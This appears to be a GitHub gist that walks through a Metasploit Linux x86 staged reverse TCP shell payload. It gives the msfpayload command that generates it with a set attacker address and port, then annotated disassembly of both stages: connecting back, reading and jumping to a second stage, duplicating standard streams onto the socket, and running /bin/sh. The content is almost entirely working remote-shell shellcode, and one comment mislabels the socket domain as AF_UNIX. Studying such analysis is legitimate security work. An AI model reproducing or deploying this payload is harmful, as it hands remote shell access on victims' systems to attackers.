Skip to content

Instantly share code, notes, and snippets.

@xstpl
Last active August 29, 2015 14:25
Show Gist options
  • Save xstpl/64da47d0e769aa09efc1 to your computer and use it in GitHub Desktop.
Save xstpl/64da47d0e769aa09efc1 to your computer and use it in GitHub Desktop.
reverse_nonx_tcp.rb
root@xstpl:~# msfpayload linux/x86/shell/reverse_nonx_tcp LHOST=192.168.1.1 LPORT=4444 R > reverse_nonx_tcp.bin
root@xstpl:~# ndisasm -b32 -p intel reverse_nonx_tcp.bin
00000000 31DB xor ebx,ebx ;
00000002 53 push ebx ; protocol = 0
00000003 43 inc ebx ; int socket(int domain, int type, int protocol);
00000004 53 push ebx ; type = SOCK_STREAM
00000005 6A02 push byte +0x2 ; domain = AF_UNIX
00000007 6A66 push byte +0x66 ; int socketcall(int call, unsigned long *args);
00000009 58 pop eax ; call = 1 (socket)
0000000A 89E1 mov ecx,esp ; args = domain, type, protocol ;struct sockaddr_in {
0000000C CD80 int 0x80 ; ; short sin_family;
0000000E 97 xchg eax,edi ; edi contains the socket descriptor ; unsigned short sin_port;
0000000F 5B pop ebx ; ebx = 2 ; struct in_addr sin_addr;
00000010 68C0A80101 push dword 0x101a8c0 ; ip = 192.168.1.1 (c0 a8 01 1) ; char sin_zero[8];
00000015 6668115C push word 0x5c11 ; port 4444 (115c) ;};
00000019 6653 push bx ; sin_family = 2 ;struct in_addr {
0000001B 89E1 mov ecx,esp ; ; unsigned long s_addr;};
0000001D 6A66 push byte +0x66 ; int socketcall(int call, unsigned long *args);
0000001F 58 pop eax ;
00000020 50 push eax ; addrlen
00000021 51 push ecx ; struct sockaddr
00000022 57 push edi ; the sockfd
00000023 89E1 mov ecx,esp ; args from socketcall
00000025 43 inc ebx ; call = int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
00000026 CD80 int 0x80
00000028 5B pop ebx ; the sockfd
00000029 99 cdq ; EDX:EAX sign-extend of AX (EDX=0)
0000002A B60C mov dh,0xc ; edx = 3072
0000002C B003 mov al,0x3 ; ssize_t read(int fd, void *buf, size_t count);
0000002E CD80 int 0x80 ; Have I forgot to mention this is STAGE 1? :p
00000030 FFE1 jmp ecx ; we jump to *buf (what ever we read!)
-------------------------------------------------------------------------------------------------------------------------------------------------------------
Stage 2 - obtained using gdb
-------------------------------------------------------------------------------------------------------------------------------------------------------------
00000000 mov ebx,edi ; remember, edi is where we keep sockfd
00000002 push 0x2 ; newfd = {stderr;stdin;stdout}
00000004 pop ecx ; we keep decrementing ecx, until we duplicate them all
00000005 push 0x3f ; int dup2(int oldfd, int newfd);
00000007 pop eax ; dup2() makes newfd be the copy of oldfd
00000008 int 0x80 ;
0000000a dec ecx ; decrement ecx to cover all std*
0000000b jns 000000005 ; jump until SF, CX=-1
0000000d push 0xb ; int execve(const char *filename, char *const argv[], char *const envp[]);
0000000f pop eax ; execve() executes the program pointed to by filename.
00000010 cdq ; EDX:EAX sign-extend of AX (EDX=0)
00000011 push edx ; null string terminator
00000012 push 0x68732f2f ; hs//
00000017 push 0x6e69622f ; nib/
0000001c mov ebx,esp ; filename= /bin//sh
0000001e push edx ; envp = 0
0000001f push ebx ; argv = ["/bin//sh"]
00000020 mov ecx,esp ;
00000022 int 0x80
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment